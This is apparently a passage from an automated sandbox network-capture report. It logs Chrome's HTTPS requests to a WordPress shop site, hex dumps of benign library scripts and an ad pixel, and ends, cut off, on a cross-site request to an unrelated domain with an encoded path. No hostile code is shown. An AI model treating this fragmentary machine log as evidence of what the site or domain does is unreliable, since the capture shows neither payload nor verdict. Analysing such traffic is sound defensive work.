                                                        2025-03-11 18:03:08 UTC603INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.449812198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:07 UTC595OUTGET /wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:08 UTC217INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:06 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 457
                                                        Connection: close
                                                        Last-Modified: Fri, 14 Jun 2024 14:11:12 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:08 UTC457INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 64 3a 28 74 2c 64 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 64 29 65 2e 6f 28 64 2c 6f 29 26 26 21 65 2e 6f 28 74 2c 6f 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 64 5b 6f 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75
                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var e={d:(t,d)=>{for(var o in d)e.o(d,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:d[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};function d(e){"undefined"!=typeof docu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.449818198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:09 UTC2226OUTGET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.9.7.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:10 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:08 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 9636
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:10 UTC9636INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 62 6c 6f 63 6b 55 49 20 70 6c 75 67 69 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 37 30 2e 30 2d 32 30 31 34 2e 31 31 2e 32 33 0a 20 2a 20 52 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 37 20 6f 72 20 6c 61 74 65 72 0a 20 2a 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 74 3a 20 68 74 74 70 3a 2f 2f 6d 61 6c 73 75 70 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 62 6c 6f 63 6b 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 37 2d 32 30 31 33 20 4d 2e 20 41 6c 73 75 70 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67
                                                        Data Ascii: /*! * jQuery blockUI plugin * Version 2.70.0-2014.11.23 * Requires jQuery v1.7 or later * * Examples at: http://malsup.com/jquery/block/ * Copyright (c) 2007-2013 M. Alsup * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.449817198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:09 UTC2216OUTGET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.9.7.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:10 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:08 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 1720
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:10 UTC1720INData Raw: 2f 2a 21 20 6a 73 2d 63 6f 6f 6b 69 65 20 76 33 2e 30 2e 35 20 7c 20 4d 49 54 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 65 7c 7c 73 65 6c 66 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 65 2e 43 6f 6f 6b 69 65 73 2c 6f 3d 65 2e 43 6f 6f 6b 69 65
                                                        Data Ascii: /*! js-cookie v3.0.5 | MIT */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self,function(){var n=e.Cookies,o=e.Cookie


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.44981645.77.88.114435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:09 UTC614OUTGET /ad.php?do=imp&aid=1125399&zid=117078&t=1741716181&auth=108567e63140a07de4bc55b82a10706c&oid=27064&wd=-1&ht=-1&ref=https%3A%2F%2Fhardylive.com%2F&uri=https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F HTTP/1.1
                                                        Host: g.adspeed.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: impuniraw=1125399-1741802586
                                                        2025-03-11 18:03:11 UTC209INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:10 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 43
                                                        Connection: close
                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                        Cache-Control: max-age=315360000
                                                        2025-03-11 18:03:11 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 04 02 04 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                        Data Ascii: GIF89a!,D;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.449821198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:11 UTC2209OUTGET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:12 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:10 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 3804
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:12 UTC3804INData Raw: 66 75 6e 63 74 69 6f 6e 20 66 6f 63 75 73 5f 70 6f 70 75 6c 61 74 65 5f 6c 69 76 65 5f 72 65 67 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 22 2c 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 65 72 72 6f 72 22 2c 22 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 6e 6f 74 69 63 65 2d 62 61 6e 6e 65 72 22 5d 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 2e 22 2b 65 2b 27 5b 72 6f 6c 65 3d 22 61 6c 65 72 74 22 5d 27 7d 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3b 69 66 28 30 21 3d 3d 6f 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 74 3d 6f 5b 30 5d 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65
                                                        Data Ascii: function focus_populate_live_region(){var e=["woocommerce-message","woocommerce-error","wc-block-components-notice-banner"].map(function(e){return"."+e+'[role="alert"]'}).join(", "),o=document.querySelectorAll(e);if(0!==o.length){var t=o[0];t.setAttribute


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.449822198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:11 UTC2242OUTGET /wp-content/uploads/sites/35/2022/09/LRRE_Webad-1.gif HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:12 UTC324INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                        Link: <https://hardylive.com/wp-json/>; rel="https://api.w.org/"
                                                        2025-03-11 18:03:12 UTC16060INData Raw: 64 66 66 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                        Data Ascii: dffa<!doctype html>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->...[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->...[i


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.449823198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:11 UTC2201OUTGET /wp-content/plugins/mailster/build/form/view.js?ver=70940c37d1c4b44da053 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22ur [TRUNCATED]
                                                        2025-03-11 18:03:12 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:10 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 7969
                                                        Connection: close
                                                        Last-Modified: Thu, 07 Nov 2024 20:30:05 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:12 UTC7969INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 6e 3a 74 3d 3e 7b 76 61 72 20 72 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 65 2e 64 28 72 2c 7b 61 3a 72 7d 29 2c 72 7d 2c 64 3a 28 74 2c 72 29 3d 3e 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 72 29 65 2e 6f 28 72 2c 73 29 26 26 21 65 2e 6f 28 74 2c 73 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 73 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 5b 73 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 3b 63 6f 6e 73 74 20 74
                                                        Data Ascii: (()=>{"use strict";var e={n:t=>{var r=t&&t.__esModule?()=>t.default:()=>t;return e.d(r,{a:r}),r},d:(t,r)=>{for(var s in r)e.o(r,s)&&!e.o(t,s)&&Object.defineProperty(t,s,{enumerable:!0,get:r[s]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};const t


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.449828185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:14 UTC636OUTGET /4YLo6Zqgi4CFoNLb17HEy5L2jZnDuMqIj+OEkJvnt4+RoMTLk6DSy4TskYOO6pudjaCV HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
